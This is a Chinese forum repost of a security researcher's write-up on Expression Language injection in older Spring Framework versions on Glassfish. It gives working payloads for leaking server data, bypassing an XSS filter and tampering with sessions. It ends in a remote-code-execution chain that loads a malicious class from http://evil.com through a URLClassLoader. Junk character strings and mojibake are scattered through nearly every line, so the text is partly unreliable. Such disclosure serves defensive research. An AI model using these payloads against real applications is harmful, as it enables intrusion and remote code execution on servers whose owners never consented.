Remote Code with
, v1 o" m4 e6 CExpression Language Injection
B( q/ @8 h- I, b; QSpring Framework脆弱性—DanAmodio
/ q6 Q6 v. u2 F. ?全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中
6 c7 i7 C- e/ U4 c4 z6 G可能会存在风险。* f3 O( t/ z) {/ m3 o4 e! P% a$ C
在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的
: @% p8 j% H5 x2 ~Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可
& L+ x3 L9 F* Q1 a" i4 W H以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
7 u* ]9 x+ w# r' O0 m8 p以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前$ b& l) |- y$ n; K! ~4 ]; V
版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。( n4 d- L5 g; c) c# B# d
由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但
+ S* t$ s) _$ ^我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版: H/ s. T9 e' F* q# K( X
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。0 L1 i& I7 |: J! m W6 P
这些版本不支持禁用double EL resolution.
' d, \: p% g2 P/ ]7 W& |这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含! }- S4 r* V5 n2 K
EL2.2容器上可能进行远程代码执行。2 S# ~' O9 B& m- ~
这是一个原始信息泄露的攻击例子:: Z# c5 n5 p5 f4 U5 ^
请求:
6 E, ^) @. B1 u. n5 J2 y Jttp://vulnerable.com/foo?message=${applicationScope}
: y5 e, ?% ?, y9 h; w$ C6 }' ~/ D到达以下内容页面:
/ R# v) q! Z2 W. H! w3 @. N结果将输出一些包含内部服务器信息calsspath 和本地工作目录! S2 a0 |: m: @2 f( p
你也可以做一些其他事情,如这样:2 C1 u$ Y: n( i* o; ]+ {
${9999+1}
) F2 X: G& W7 `! F5 h还可以访问session 对象和beans) i# a8 G6 l8 R3 x [! I9 z
${employee.lastName}9 L \6 [6 h# |% {0 @
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是
/ [) }( i( z' j8 |/ REL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东7 A6 |# [; w; B
西,比如XSS.) G a X2 G; `% ~6 p2 Z {8 h+ c* W
哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签
W: e# j0 U, a; X9 n& t/ J突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤
+ r2 T. B+ N6 P; b( Q. w- n呢?”
+ k9 b1 {+ W/ i1 P8 o2 r, x" m因此,我尝试巳缦拢�
# O2 l; L6 o/ ]1 i; I. Ahttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP
9 [. V2 g0 x5 w, D' C# U4 rP
1 Q3 F: A2 \ K$ F+ X我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返8 d3 D- q( C+ S3 J. {+ K( l
回的文本被插入进了spring:message 标签。& B/ i+ ^; D* A% P* r8 E& G
这里是一个最终绕过过滤的实例:* _* Q. z: F" F( J a a) o4 o
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ
- ^! S9 A( x. l/ X它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为( b+ @& d) |: d6 \% r% j4 B4 l
什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢? `. E$ M: ~5 r' y+ s" H( J/ g4 B) G2 L
经过一番研究,我学习到EL2.2 增加了方法调用。6 g& F" N% m/ H7 g
我写了一个快速测试应用程序代码并且检测一些功能2 J6 H6 h. p; z$ h* W
${pageContext.request.getSession().setAttribute(“account”,”123456″)}7 F& Y$ D# W% [1 E! @) f8 C
${pageContext.request.getSession().setAttribute(“admin”,true)}
4 D2 x$ W( F# J5 a: w好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的
- r, h) u t" B/ S1 W& }指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?
% S: e9 {* x0 [0 T7 E4 X1 v' \${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1$ x! O! B5 i5 ?8 j6 H+ F. [
“, 1234)}
4 m4 R2 M8 S0 E9 h, [, d7 E${“”.getClass().forName(“java.lang.Runtime”)}# x' h: P7 a( S1 W0 \+ g
哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不$ E. u3 ^; T t
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函! T, Q3 V' m4 G/ w8 P" Z
数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有3 @: S; R+ C0 G1 D& O/ Y; h
一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于) W }. e! y& X. M; S, u
方法签名invoke(Object obj, Object„ args)3 l3 j" }2 S3 `7 n+ { Q: Q7 n, Z
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问2 h* N: w6 Y+ |- k+ J/ f8 j. Z# \6 r$ ^
题,以让它可以工作起来。
! |+ _, P) }1 E漏洞利用:/ ~/ H- M; ?$ l
我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我
`1 `/ @7 Q( B) M3 a& y/ B希望你们中的一些JAVA奇才告诉我我是如此的可笑。
2 M( g$ E( N: o1 {3 E' T6 F6 i这里有一些我试过的失败的用例,为了试图让它工作的用例:
- M7 x- O ~# q$ U 写文件到文件系统
5 ~/ U9 i& I0 I$ p: T; U 试图载入org.springframework.expression.spel.standard.SpelExpressionParser.
7 C: V! V. M+ L) R$ A: h6 _/ y; n我认为这些可以很好的工作,但是我不能找到合适的类来载入。& V3 ~ n v% ^& u
${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}
' E# f0 W4 }, z" b* K* Ejavax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:
7 Q' o) P" t) D" Z+ }7 x% ^% {org.springframework.expression.spel.standard.SpelExpressionParser not found; ?+ N( q" O+ B0 R2 ^ d
by
5 V8 N5 Q3 A1 x) ?) ]% Iorg.glassfish.web.javax.servlet.jsp [194]. d7 K# i+ J# d. N5 h% n
利用反射来修改java.lang.Runtime.currentRuntime的属性为Public. d$ t9 Z2 v+ A/ \6 l" g
利用反射来创建一个新的Runtime(and watch the world burn); v0 `: x" z4 i* {+ C( q, w- _
${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName
4 X0 H3 C, O5 R4 `1 b(“java.lang.Runtime”)).getDeclaredConstructors()[0])}' V0 \5 `- Y( e: M" H1 K
${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}) C# f: g4 u8 V+ e0 ?0 i
使用java.lang.ProcessBuilder* b1 M- r$ W y1 n& ?
用表达式语言来评估表达式语言$ u! P# S1 D! I& a" R/ i7 ~8 U; V
Expression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.
) n8 E9 |. v% w6 N2 M( ?${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request3 A9 R- k+ _. `9 g2 I
“,”".getClass(),null)}- J# [1 O( B; d5 `) j& T4 ^
创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)
4 m5 J6 ?$ d, S我在使用一个空数组通过Method.invoke()时失败了很多次
9 \( Y$ A2 n5 f$ U' H/ j$ X“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo* d" T; [ e1 e' ]
.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A+ U4 p) Q1 s. E# u! ]
rrayList”).newInstance().toArray())+ ~6 @7 x) _ ~- J9 {7 n6 E1 m
java.lang.IllegalArgumentException: wrong number of arguments
8 R8 F- g2 a X" G. h/ U最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可. K2 j7 G) k; P9 j2 p" J# l
以创建一个恶意class文件并且指向类装载器.
; y$ G) I! f3 m我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:
0 f. Z( j0 O6 Q9 a( K+ B' A* ppublic class Malicious {' ` I% @( e: s
public Malicious() {
( T$ B) d0 ]% T' F0 Rtry {
, E5 j1 r/ B3 l" C/ |" Wjava.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac
5 u7 t. c0 u2 g! l2 T, ?, [0 v1 ~java.lang.Runtime.getRuntime().exec(“calc.exe”); //Win
( n# Y. A% | g1 j6 M' T} catch (Exception e) {. M7 ~0 C5 u7 ~/ r4 s" p5 O) V
}
2 K( c! f1 \9 B}
' ]4 p9 l$ B% h, l0 I) V" {我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回2 u0 W. ^# q5 X1 q8 B
话中,因此它可以被使用.
7 b+ \. F- _9 w; G! m, d; r- v${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName7 R L$ X; w9 S8 P5 ?
(“java.util.ArrayList”).newInstance())}8 E& k7 Q a! m" C
URLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建0 _6 O( Z5 F1 f8 e
一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和) x! j3 y' X ?8 O& ~" _- A
getResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个4 R7 w6 N% m' X1 w8 H
我们可以调用的create(string)方法,然后转换对一个URL对象。9 d6 S" o. }) T: k- H# M
${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh
) H9 i6 ]- B! Lere/malicious/classfile/is/located/”).toURL())}4 w4 G! O9 w8 F' t6 O4 P, R
然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,0 S3 q" q% t, `4 ]7 N: [% O
恶意类文件被装载并创建,触发远程代码.; o v+ j1 E7 P8 _
${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte
# W. D# X9 ~% F: V3 qxt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().
- u- p( [2 v$ X* w$ |getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance! K. j) G* t6 T1 M8 I% o
()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对